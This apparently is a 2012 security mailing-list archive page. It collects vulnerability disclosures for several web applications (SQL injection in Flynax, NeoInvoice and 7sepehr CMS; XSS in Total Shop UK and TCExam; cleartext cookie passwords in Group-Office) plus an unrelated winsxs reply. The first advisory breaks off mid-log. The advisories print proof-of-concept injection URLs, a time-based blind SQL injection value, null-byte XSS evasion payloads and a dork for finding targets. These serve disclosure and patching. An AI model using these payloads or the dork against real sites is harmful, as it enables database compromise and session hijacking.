http://www.vulnerability-lab.com/get_content.php?id=659


VL-ID:
=
659


Common Vulnerability Scoring System:

8.3


Introduction:
=
Choosing Flynax General Classifieds software allows you to set up any 
classifieds website. It is not designed for a 
particular niche so it can be adjusted to any idea of a classifieds website. 
This gives you a chance to choose the 
any niche for your classifieds website. For example you may create a 
classifieds website which will base on local 
classifieds with job ads, sport goods, motorbikes, bicycles or be oriented on 
all ideas in one website. Using General 
classifieds software with plugins you may create that classifieds website which 
you desire to have.

(Copy of the Vendor Homepage: 
http://www.flynax.com/general-classifieds-software.html )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web 
Vulnerabilities in the Flynax General Classifieds v4.0 CMS.


Report-Timeline:

2012-07-13: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

1.1
A SQL Injection vulnerability is detected in the Flynax General Classifieds 
v4.0 Content Management System. Remote attackers 
without privileged user accounts can execute/inject own sql commands to 
compromise the application dbms. The vulnerability is 
located in the general module with the bound vulnerable sort_by parameter. 
Successful exploitation of the vulnerability result 
in dbms (Server) or application (Web) compromise. Exploitation requires no user 
inter action  without privileged user account.

Vulnerable Module(s):
[+] General

Vulnerable Parameter(s):
[+] sort_by


1.2
Multiple persistent input validation vulnerabilities are detected in the Flynax 
General Classifieds v4.0 Content Management System.
The bugs allow remote attackers to implement/inject malicious script code on 
the application side (persistent). The persistent 
vulnerabilities are located in Administrators, User Account  Categories 
add/list modules with the bound vulnerable titel  username
parameters. Successful exploitation of the vulnerability can lead to session 
hijacking (manager/admin) or stable (persistent) context 
manipulation. Exploitation requires low user inter action  privileged user 
account.

Vulnerable Module(s):
[+] Common  Administrators  Add an 
Administrator  Listing
[+] User Accounts  Add an User Account  
Listing
[+] Categories  Add a Category  Listing

Vulnerable Parameter(s):
[+] Username
[+] Titel


1.3
Multiple non persistent cross site scripting vulnerabilities are detected in 
the Flynax General Classifieds v4.0 Content Management System.
The vulnerability allows remote attackers to hijack website customer, moderator 
or admin sessions with medium or high required user inter 
action or local low privileged user account. The bugs are located in the  seach 
module with the bound vulnerable Titel  Price parameters. 
Successful exploitation can result in account steal, client side phishing  
client-side content request manipulation. Exploitation requires 
medium or high user inter action  without privileged web application user 
account.

Vulnerable Module(s):
[+] Search

Vulnerable Parameter(s):
[+] Titel
[+] Price


Proof of Concept:
=
1.1
The SQL Injection Vulnerability can be exploited by remote attackers without 
user inter action  without privileged user account.
For demonstration or reproduce ...

PoC:
http://general.[SERVER]:1339/general?sort_by=-1 union all select 
1,2,3,4,5,6,7,8,9,@@version,11--



--- Exception Logs ---

MYSQL ERROR
Error:  Unknown column 'T1.' in 'order clause'

Query:  SELECT SQL_CALC_FOUND_ROWS DISTINCT 
SUBSTRING_INDEX(GROUP_CONCAT(DISTINCT `T6`.`Thumbnail` ORDER BY `T6`.`Type` 
DESC, `T6`.`ID` ASC), ',', 1) AS `Main_photo`, `T1`.*, `T1`.`Shows`, 
`T3`.`Path` AS `Path`, `T3`.`Key` AS `Key`, `T3`.`Type` 
AS `Listing_type`, COUNT(`T6`.`Thumbnail`) AS `Photos_count`, 
IF(UNIX_TIMESTAMP(DATE_ADD(`T1`.`Featured_date`, INTERVAL `T2`.`
Listing_period` DAY))  UNIX_TIMESTAMP(NOW()) OR `T2`.`Listing_period` = 0, 
'1', '0') `Featured` FROM `fl_listings` AS `T1` 
LEFT JOIN `fl_listing_plans` AS `T2` ON `T1`.`Plan_ID` = `T2`.`ID` LEFT JOIN 
`fl_categories` AS `T3` ON `T1`.`Category_ID` = 
`T3`.`ID` LEFT JOIN `fl_listing_photos` AS `T6` ON `T1`.`ID` = 
`T6`.`Listing_ID` LEFT JOIN `fl_accounts` AS `T7` ON `T1`.`

Re: How well does Microsoft support (and follow) their mantra keep your PC updated?

2012-08-14 Thread Thomas D. 
Hi,

I am not sure if I got your point.

First, winsxs is Microsoft's Windows file repository. Every part of
Windows is splitted into components and packages. Every package will be
copied into the winsxs folder.

But the content of the winsxs folder doesn't represent the currently
installed features. So for example you could have the IIS package in
winsxs, but IIS isn't currently installed on your system.
But if you would install IIS now, you won't be prompted for a Windows
installation media, because the package is already in the winsxs folder.

Same applies to updates:
If a new version of a package becomes available (Hotfix, Security Update
or just a normal update), Windows will copy the new package into the
winsxs folder, next to the already existing older version of the
package. This will let the winsxs folder grow, but will also make sure
that you are able to remove *every* package at *every* time you want,
because you are able to reinstall the previous version.

I hope this was clear and nothing new for you. So what's your point?
What's wrong when multiple versions of the Visual C++ runtimes are
present in the winsxs folder? Nothing.
It is only important which version is marked as active.

I agree with you:
It is not nice, to ship installers with outdated components installer.
But it wouldn't be better to release an updated installer every 2
month... So if Microsoft (or any other company) will ship a new program
today, it should be bundled with the latest version of the component
they are using, because if I haven't installed this component at the
moment, I don't want to be vulnerable *after* I install a new product
(BTW: Did you ever noticed the end of the Office installation? Microsoft
is prompting you to visit Windows updates, just because they know that
they will have installed a product/components, which are already out of
date).
From my experience, Windows Updates is keeping my Windows components
like Visual C++ runtimes up to date:

http://f.666kb.com/i/c6auyx3go8yvhktuo.jpg

So if you noticed an undetected old version, this is a bug and should be
reported to Microsoft. They often re-release Windows Updates because of
wrong/improved detections.

Regarding VC++ 2005 is end of life:
If you are expecting, that programs compiled against a specific runtime
version will be recompiled, just because the runtime is end of life, you
are wrong and - from my point of view - have not understand how runtimes
will be used and why it isn't really a risk.

But as I said in the beginning, maybe I didn't get your point.


-- 
Regards,
Thomas

NeoInvoice Blind SQL Injection (CVE-2012-3477)

2012-08-14 Thread Adam Caudill 
NeoInvoice is a multi-tenant open source invoicing system, that
currently contains an unauthenticated blind SQL injection condition in
signup_check.php. The input for the value field isn't being properly
sanitized, and is used in string concatenation to create the SQL
query.

See here for the offending code:

https://github.com/tlhunter/neoinvoice/blob/5e7af94641cba17df9141e95108c369cfb6e6dd5/public/signup_check.php#L29

Proof of concept:

signup_check.php?field=usernamevalue='+OR+SLEEP(5)+OR+'

I've alerted the author but haven't heard back.

More Info: 
http://adamcaudill.com/2012/08/12/neoinvoice-blind-sql-injection-cve-2012-3477/
Project: https://github.com/tlhunter/neoinvoice

--Adam Caudill
http://adamcaudill.com

7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities

2012-08-14 Thread Vulnerability Lab 
Title:
==
7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities 


Date:
=
2012-08-12


References:
===
http://www.vulnerability-lab.com/get_content.php?id=679


VL-ID:
=
680


Common Vulnerability Scoring System:

8.3


Abstract:
=
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered 
multiple SQL Injection Vulnerabilities in the 7sepehr CMS.


Report-Timeline:

Vulnerability Laboratory [Research Team]  - Ibrahim El-Sayed [storm] 
(st...@vulnerability-lab.com)


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

Multiple SQL Injection vulnerabilities are detected in the official 7sepehr.com 
Content Management System 2012. 
Remote attackers can execute/inject own sql commands to compromise the affected 
application dbms. The vulnerabilities 
are located in the news_detail, news_view and content asp modules with the 
bound vulnerable id parameter. 
Successful exploitation of the remote sql injection vulnerability result in 
dbmsor web application compromise. 


Vulnerable File(s):
[+] news_Detail.asp
[+] newsview.asp
[+] contents.aspx

Vulnerable Parameter(s):
[+] id



Proof of Concept:
=
The remote sql injection vulnerabilities can be exploited by remote attackers 
without privileged user account  
without required user inter action. For demonstration or reproduce ...

Dork:  `Powered by 7sepehr.com`

PoC:
http://127.0.0.1:1338/news/news_Detail.asp?id=-1 union all select [SQL 
INJECTION VULNERABILITY]--  
http://127.0.0.1:1338/news/newsview.asp?id=-1 union all select [SQL INJECTION 
VULNERABILITY]--  
http://127.0.0.1:1338/contents.aspx?id=-1 union all select [SQL INJECTION 
VULNERABILITY]--


Risk:
=
The security risk of the remote sql injection vulnerabilities are estimated as 
critical.


Credits:

Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Total Shop UK eCommerce Generic Cross-Site Scripting

2012-08-14 Thread research 
/--\
| Total Shop UK eCommerce Generic Cross-Site Scripting |
\--/


Summary
===

The open source version of Total Shop UK eCommerce based on CodeIgniter
version 2.1.2 is subject to a cross-site scripting vulnerability. The value
of a generic parameter was not sufficiently sanitised before being written
to a block of Javascript code. An attacker could distribute a malicious URL
that would trigger this vulnerability and potentially steal session cookies,
redirect the user to a malicious URL or download malware onto their machine.

CVE number: CVE-2012-4236
Impact: Medium
Vendor homepage: http://www.totalshopuk.com/
Vendor notified: 06/08/2012
Credit: Chris Cooper of Reaction Information Security
(http://www.reactionis.co.uk/)

This advisory is posted at:

http://www.reactionpenetrationtesting.co.uk/totalshop-uk-generic-xss.html


Affected Products
 

Total Shop UK eCommerce based on CodeIgniter version 2.1.2 (open source
version). Other versions may be affected.


Details
===

Generic parameters in the /application/modules/_main/views/_top.php file are
written to a Javascript function in the page header without sanitisation.
The entire URL, including the query string, is written (via a PHP echo
construct) into a refresh_page() Javascript function. It was possible to
escape the function and execute arbitrary Javascript code on the application
pages. 

There is some character filtering in place, although this can be evaded by
inserting a null (%00) character (see proof of concept).


Impact
==

An attacker might entice users to follow a malicious URL, causing Javascript
code to execute in their browser, potentially stealing session cookies,
redirecting the user to a malicious URL or downloading malware onto their
machine.


Proof of Concept
= == ===

Injecting the following Javascript code into a generic parameter on any
application page will trigger the vulnerability, causing the page to return
a Javascript alert box.

%00;};alert(String.fromCharCode(120,115,115,116,101,115,116));{//

---
Example 1 Request:
+-

GET /?%00;};alert(String.fromCharCode(120,115,115,116,101,115,116));{//=1
HTTP/1.1
Host: 192.168.0.6
Referer: http://192.168.0.6/about


---
Example 1 Response:
+--

--- SNIP ---
function refresh_page(){
 
parent.location=/?%00;};alert(String.fromCharCode(120,115,115,116,101,115,
116));{//=1; 
}
--- SNIP ---


Solution


Upgrade to Total Shop UK eCommerce 2.1.2_p1. Download link here:
http://sourceforge.net/projects/totalshopuk/files/TSUK_eCommerce_v2.1.2_p1.z
ip/download


Distribution


In addition to posting on the website, a text version of this notice has
been posted to the following e-mail and Usenet news recipients.

* bugtraq () securityfocus com
* full-disclosure () lists grok org uk

Future updates of this advisory, if any, will be placed on the ReactionIS
corporate website, but may or may not be actively announced on mailing lists
or newsgroups. Users concerned about this problem are encouraged to check
the URL below for any updates:


http://www.reactionpenetrationtesting.co.uk/totalshop-uk-generic-xss.html


==

Reaction Information Security 
Lombard House Business Centre,
Suite 117,
12-17 Upper Bridge Street,
Canterbury, Kent, CT1 2NF

Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk

TCExam Edit Cross-Site Scripting

2012-08-14 Thread research 
/--\
| TCExam Edit Cross-Site Scripting |
\--/


Summary
===

TCExam 11.3.007 is subject to a cross-site scripting vulnerability. A
'question_subject_id' parameter is not sufficiently sanitised before being
written to the tce_edit_answer.php page. An attacker could distribute a
malicious URL to specific users as part of a spear-phishing campaign. Users
following the link would trigger this vulnerability which could potentially
steal session cookies, redirect the user to a malicious URL or download
malware onto their machine.

CVE number: CVE-2012-4238
Impact: Medium
Vendor homepage: http://www.tcexam.org/
Vendor notified: 06/08/2012
Vendor fixed: 06/08/2012
Credit: Chris Cooper of Reaction Information Security
(http://www.reactionis.co.uk/)

This advisory is posted at:

http://www.reactionpenetrationtesting.co.uk/tcexam-cross-site-scripting.html


Affected Products
 

Confirmed in TCExam 11.3.007. Prior versions may also be affected.


Details
===

The question_subject_id parameter on the tce_edit_answer.php page was found
to be subject to a cross-site scripting vulnerability. It was possible to
inject arbitrary Javascript code into the parameter which is passed into the
page content without sanitisation. 

The fact that the user must be authenticated as well as an administrator
(permission level 5 or above) reduces the likelihood of a successful attack.
However, the vulnerability could potentially be leveraged in a spear
phishing attack, targeted at exam authors and administrators, to hijack
their sessions.


Impact
==

An attacker might entice users to follow a malicious URL, causing Javascript
code to execute in their browser, potentially stealing session cookies,
redirecting the user to a malicious URL or downloading malware onto their
machine.


Proof of Concept
= == ===

Injecting the following Javascript code into a generic parameter on the
calendar page will trigger the vulnerability, causing the page to return a
Javascript alert box.

scriptalert(String.fromCharCode(120,115,115,116,101,115,116))/script

---
Example 1 Request:
+-

GET
/TCExam/admin/code/tce_edit_answer.php?subject_module_id=2question_subject_
id=1scriptalert(String.fromCharCode(120,115,115,116,101,115,116))/scrip
tanswer_question_id=7 HTTP/1.1
Host: 192.168.0.6
Referer: http://192.168.0.6/TCExam/admin/code/tce_edit_question.php
Cookie: PHPSESSID=db1fe2b665994ff76356e7a28abfa5df

---
Example 1 Response:
+--

--- SNIP ---
a
href=tce_edit_question.php?subject_module_id=2amp;question_subject_id=1\
scriptalert(String.fromCharCode(120,115,115,116,101,115,116))/scriptamp
;question_id=7 title=Question Management class=xmlbuttonlt; Question
Management/a/span
--- SNIP ---


Solution


Upgrade to TCExam 11.3.008.


Distribution


In addition to posting on the website, a text version of this notice has
been posted to the following e-mail and Usenet news recipients.

* bugtraq () securityfocus com
* full-disclosure () lists grok org uk 

Future updates of this advisory, if any, will be placed on the ReactionIS
corporate website, but may or may not be actively announced on mailing lists
or newsgroups. Users concerned about this problem are encouraged to check
the URL below for any updates:



http://www.reactionpenetrationtesting.co.uk/tcexam-cross-site-scripting.html


==

Reaction Information Security 
Lombard House Business Centre,
Suite 117,
12-17 Upper Bridge Street,
Canterbury, Kent, CT1 2NF

Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk

Group-Office Cleartext Credentials Stored in Cookies

2012-08-14 Thread research 
/--\
| Group-Office Cleartext Credentials Stored in Cookies |
\--/


Summary
===

Group-Office 4.0.71 was found to display a behaviour that could potentially
expose a user's username and cleartext password to third-parties. Under
certain circumstances the application would return two cookies, one
containing the user's username and the other their cleartext password. These
cookies would then be returned to the server with each request to the
application.

CVE number: CVE-2012-4239
Impact: Medium
Vendor homepage: http://www.group-office.com/
Vendor notified: 19/07/2012
Vendor fixed: 25/07/2012
Credit: Chris Cooper and Joseph Sheridan of Reaction Information Security
(http://www.reactionpenetrationtesting.co.uk/)

This advisory is posted at:

http://www.reactionpenetrationtesting.co.uk/group-office-cookies.html


Affected Products
 

Confirmed in Group-Office community 4.0.71. Other versions may also be
affected.


Details
===

When logging into the application, if a user ticks the 'Remember my login on
this computer until I press logout' box, and then successfully logs into the
application, two cookies ('GO_UN' and 'GO_PW') are returned. These cookies
contain the user's username and cleartext password respectively.

The cookies are set with the 'HttpOnly' flag which would significantly
reduce the chances of their disclosure during a cross-site scripting attack.
However, the application does not enforce a secure channel by default, and
the offending cookies are not set with the 'Secure' flag.


Impact
==

Once these cookies are stored, the user's username and password could be
transferred over an insecure HTTP connection, increasing the liklihood that
an attacker might be able to intercept the credentials and access the
application.

Furthermore, the cleartext credentials will be stored on the computer which
makes them more easily accessible to an attacker with access to the machine.
This significantly lowers the difficulty of exploitation.


Solution


Upgrade to Group-Office community 4.0.73.


Distribution


In addition to posting on the website, a text version of this notice has
been posted to the following e-mail and Usenet news recipients.

* bugtraq () securityfocus com
* full-disclosure () lists grok org uk

Future updates of this advisory, if any, will be placed on the ReactionIS
corporate website, but may or may not be actively announced on mailing lists
or newsgroups. Users concerned about this problem are encouraged to check
the URL below for any updates:



http://www.reactionpenetrationtesting.co.uk/group-office-cookies.html


==

Reaction Information Security 
Lombard House Business Centre,
Suite 117,
12-17 Upper Bridge Street,
Canterbury, Kent, CT1 2NF

Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk